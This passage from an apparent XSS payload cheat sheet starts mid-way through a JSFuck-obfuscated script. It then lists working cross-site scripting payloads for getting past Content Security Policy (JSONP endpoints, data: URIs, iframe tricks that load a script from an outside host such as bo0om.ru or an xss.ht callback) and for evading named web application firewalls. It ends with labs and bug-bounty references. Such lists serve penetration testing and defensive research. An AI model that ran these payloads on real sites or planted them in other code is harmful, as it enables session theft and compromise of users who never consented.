+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script> ``` ### Bypass using jsfuck Bypass using [jsfuck](http://www.jsfuck.com/) ```javascript [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])() ``` ## CSP Bypass Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://websecblog.com/vulns/google-csp-evaluator/) ### Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27)) //google.com/complete/search?client=chrome&jsonp=alert(1); ```js <script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>" ``` More JSONP endpoints: * [/Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt) * [JSONBee/jsonp.txt](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt) ### Bypass CSP by [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa) Works for CSP like `Content-Security-Policy: default-src 'self' 'unsafe-inline';`, [POC here](http://hsts.pro/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//bo0om.ru/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;) ```js script=document.createElement('script'); script.src='//bo0om.ru/csp.js'; window.frames[0].document.head.appendChild(script); ``` ### Bypass CSP by [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f) ```js // CSP Bypass with Inline and Eval d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000) ``` ### Bypass CSP by [@akita_zen](https://twitter.com/akita_zen) Works for CSP like `script-src self` ```js <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object> ``` ### Bypass CSP by [@404death](https://twitter.com/404death/status/1191222237782659072) Works for CSP like `script-src 'self' data:` as warned about in the official [mozilla documentation](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src). ```javascript <script src="data:,alert(1)">/</script> ``` ## Common WAF Bypass ### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/bohdansec) #### 25st January 2021 ```html <svg/onrandom=random onload=confirm(1)> <video onnull=null onmouseover=confirm(1)> ``` #### 21st April 2020 ```html <svg/OnLoad="`${prompt``}`"> ``` #### 22nd August 2019 ```html <svg/onload=%26nbsp;alert`bohdan`+ ``` #### 5th June 2019 ```html 1'"><img/src/onerror=.1|alert``> ``` #### 3rd June 2019 ```html <svg onload=prompt%26%230000000040document.domain)> <svg onload=prompt%26%23x000000028;document.domain)> xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> ``` ### Cloudflare XSS Bypass - 22nd March 2019 (by @RakeshMane10) ``` <svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f ``` ### Cloudflare XSS Bypass - 27th February 2018 ```html <a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a> ``` ### Chrome Auditor - 9th August 2018 ```javascript </script><svg><script>alert(1)-%26apos%3B ``` Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B) ### Incapsula WAF Bypass by [@Alra3ees](https://twitter.com/Alra3ees/status/971847839931338752)- 8th March 2018 ```javascript anythinglr00</script><script>alert(document.domain)</script>uxldz anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz ``` ### Incapsula WAF Bypass by [@c0d3G33k](https://twitter.com/c0d3G33k) - 11th September 2018 ```javascript <object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object> ``` ### Incapsula WAF Bypass by [@daveysec](https://twitter.com/daveysec/status/1126999990658670593) - 11th May 2019 ```html <svg onload\r\n=$.globalEval("al"+"ert()");> ``` ### Akamai WAF Bypass by [@zseano](https://twitter.com/zseano) - 18th June 2018 ```javascript ?"></script><base%20c%3D=href%3Dhttps:\mysite> ``` ### Akamai WAF Bypass by [@s0md3v](https://twitter.com/s0md3v/status/1056447131362324480) - 28th October 2018 ```html <dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x> ``` ### WordFence WAF Bypass by [@brutelogic](https://twitter.com/brutelogic) - 12th September 2018 ```javascript <a href=javas&#99;ript:alert(1)> ``` ### Fortiweb WAF Bypass by [@rezaduty](https://twitter.com/rezaduty) - 9th July 2019 ```javascript \u003e\u003c\u0068\u0031 onclick=alert('1')\u003e ``` ## Labs * [PortSwigger Labs for XSS](https://portswigger.net/web-security/all-labs#cross-site-scripting) ## References - [Unleashing-an-Ultimate-XSS-Polyglot](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot) - tbm - [(Relative Path Overwrite) RPO XSS - Infinite Security](http://infinite8security.blogspot.com/2016/02/welcome-readers-as-i-promised-this-post.html) - [RPO TheSpanner](http://www.thespanner.co.uk/2014/03/21/rpo/) - [RPO Gadget - innerthmtl](http://blog.innerht.ml/rpo-gadgets/) - [Relative Path Overwrite - Detectify](http://support.detectify.com/customer/portal/articles/2088351-relative-path-overwrite) - [XSS ghettoBypass - d3adend](http://d3adend.org/xss/ghettoBypass) - [XSS without HTML: Client-Side Template Injection with AngularJS](http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html) - [XSSING WEB PART - 2 - Rakesh Mane](http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html) - [Making an XSS triggered by CSP bypass on Twitter. @tbmnull](https://medium.com/@tbmnull/making-an-xss-triggered-by-csp-bypass-on-twitter-561f107be3e5) - [Ways to alert(document.domain) - @tomnomnom](https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309) - [D1T1 - Michele Spagnuolo and Lukas Wilschelbaum - So We Broke All CSPs](https://conference.hitb.org/hitbsecconf2017ams/materials/D1T1%20-%20Michele%20Spagnuolo%20and%20Lukas%20Wilschelbaum%20-%20So%20We%20Broke%20All%20CSPS.pdf) - [Sleeping stored Google XSS Awakens a $5000 Bounty](https://blog.it-securityguard.com/bugbounty-sleeping-stored-google-xss-awakens-a-5000-bounty/) by Patrik Fehrenbach - [RPO that lead to information leakage in Google](http://blog.innerht.ml/rpo-gadgets/) by filedescriptor - [God-like XSS, Log-in, Log-out, Log-in](https://whitton.io/articles/uber-turning-self-xss-into-good-xss/) in Uber by Jack Whitton - [Three Stored XSS in Facebook](http://www.breaksec.com/?p=6129) by Nirgoldshlager - [Using a Braun Shaver to Bypass XSS Audit and WAF](https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify) by Frans Rosen - [An XSS on Facebook via PNGs & Wonky Content Types](https://whitton.io/articles/xss-on-facebook-via-png-content-types/) by Jack Whitton - [Stored XSS in *.ebay.com](https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/) by Jack Whitton - [Complicated, Best Report of Google XSS](https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss) by Ramzes - [Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com](https://hackerone.com/reports/150179) by secgeek - [Command Injection in Google Console](http://www.pranav-venkat.com/2016/03/command-injection-which-got-me-6000.html) by Venkat S - [Facebook's Moves - OAuth XSS](http://www.paulosyibelo.com/2015/12/facebooks-moves-oauth-xss.html) by PAULOS YIBELO - [Stored XSS in Google Docs (Bug Bounty)](http://hmgmakarovich.blogspot.hk/2015/11/stored-xss-in-google-docs-bug-bounty.html) by Harry M Gertos - [Stored XSS on developer.uber.com via admin account compromise in Uber](https://hackerone.com/reports/152067) by James Kettle (albinowax) - [Yahoo Mail stored XSS](https://klikki.fi/adv/yahoo.html) by Klikki Oy - [Abusing XSS Filter: One ^ leads to XSS(CVE-2016-3212)](http://mksben.l0.cm/2016/07/xxn-caret.html) by Masato Kinugawa - [Youtube XSS](https://labs.detectify.com/2015/06/06/google-xss-turkey/) by fransrosen - [Best Google XSS again](https://sites.google.com/site/bughunteruniversity/best-reports/openredirectsthatmatter) - by Krzysztof Kotowicz - [IE & Edge URL parsing Problem](https://labs.detectify.com/2016/10/24/combining-host-header-injection-and-lax-host-parsing-serving-malicious-data/) - by detectify - [Google XSS subdomain Clickjacking](http://sasi2103.blogspot.sg/2016/09/combination-of-techniques-lead-to-dom.html) - [Microsoft XSS and Twitter XSS](http://blog.wesecureapp.com/xss-by-tossing-cookies/) - [Google Japan Book XSS](http://nootropic.me/blog/en/blog/2016/09/20/%E3%82%84%E3%81%AF%E3%82%8A%E3%83%8D%E3%83%83%E3%83%88%E3%82%B5%E3%83%BC%E3%83%95%E3%82%A3%E3%83%B3%E3%82%92%E3%81%97%E3%81%A6%E3%81%84%E3%81%9F%E3%82%89%E3%81%9F%E3%81%BE%E3%81%9F%E3%81%BEgoogle/) - [Flash XSS mega nz](https://labs.detectify.com/2013/02/14/how-i-got-the-bug-bounty-for-mega-co-nz-xss/) - by frans - [Flash XSS in multiple libraries](https://olivierbeg.com/finding-xss-vulnerabilities-in-flash-files/) - by Olivier Beg - [xss in google IE, Host Header Reflection](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html) - [Years ago Google xss](http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf) - [xss in google by IE weird behavior](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html) - [xss in Yahoo Fantasy Sport](https://web.archive.org/web/20161228182923/http://dawgyg.com/2016/12/07/stored-xss-affecting-all-fantasy-sports-fantasysports-yahoo-com-2/) - [xss in Yahoo Mail Again, worth $10000](https://klikki.fi/adv/yahoo2.html) by Klikki Oy - [Sleeping XSS in Google](https://blog.it-securityguard.com/bugbounty-sleeping-stored-google-xss-awakens-a-5000-bounty/) by securityguard - [Decoding a .htpasswd to earn a payload of money](https://blog.it-securityguard.com/bugbounty-decoding-a-%F0%9F%98%B1-00000-htpasswd-bounty/) by securityguard - [Google Account Takeover](http://www.orenh.com/2013/11/google-account-recovery-vulnerability.html#comment-form) - [AirBnb Bug Bounty: Turning Self-XSS into Good-XSS #2](http://www.geekboy.ninja/blog/airbnb-bug-bounty-turning-self-xss-into-good-xss-2/) by geekboy - [Uber Self XSS to Global XSS](https://httpsonly.blogspot.hk/2016/08/turning-self-xss-into-good-xss-v2.html) - [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf)](https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff#.cktt61q9g) by Marin MoulinierFollow - [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/) by Brett - [XSSI, Client Side Brute Force](http://blog.intothesymmetry.com/2017/05/cross-origin-brute-forcing-of-saml-and.html) - [postMessage XSS on a million sites - December 15, 2016 - Mathias Karlsson](https://labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/) - [postMessage XSS Bypass](https://hackerone.com/reports/231053) - [XSS in Uber via Cookie](http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/) by zhchbin - [Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP](https://hackerone.com/reports/207042) by frans - [XSS due to improper regex in third party js Uber 7k XSS](http://zhchbin.github.io/2016/09/10/A-Valuable-XSS/) - [XSS in TinyMCE 2.4.0](https://hackerone.com/reports/262230) by Jelmer de Hen - [Pass uncoded URL in IE11 to cause XSS](https://hackerone.com/reports/150179) - [Twitter XSS by stopping redirection and javascript scheme](http://blog.blackfan.ru/2017/09/devtwittercom-xss.html) by Sergey Bobrov - [Auth DOM Uber XSS](http://stamone-bug-bounty.blogspot.hk/2017/10/dom-xss-auth_14.html) - [Managed Apps and Music: two Google reflected XSSes](https://ysx.me.uk/managed-apps-and-music-a-tale-of-two-xsses-in-google-play/) - [App Maker and Colaboratory: two Google stored XSSes](https://ysx.me.uk/app-maker-and-colaboratory-a-stored-google-xss-double-bill/) - [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be) - [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html) - [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) - [XSS cheat sheet - PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) - [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf) - [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056) - [Bypass < with <](https://hackerone.com/reports/639684) - [Bypassing Signature-Based XSS Filters: Modifying Script Code](https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-script-code)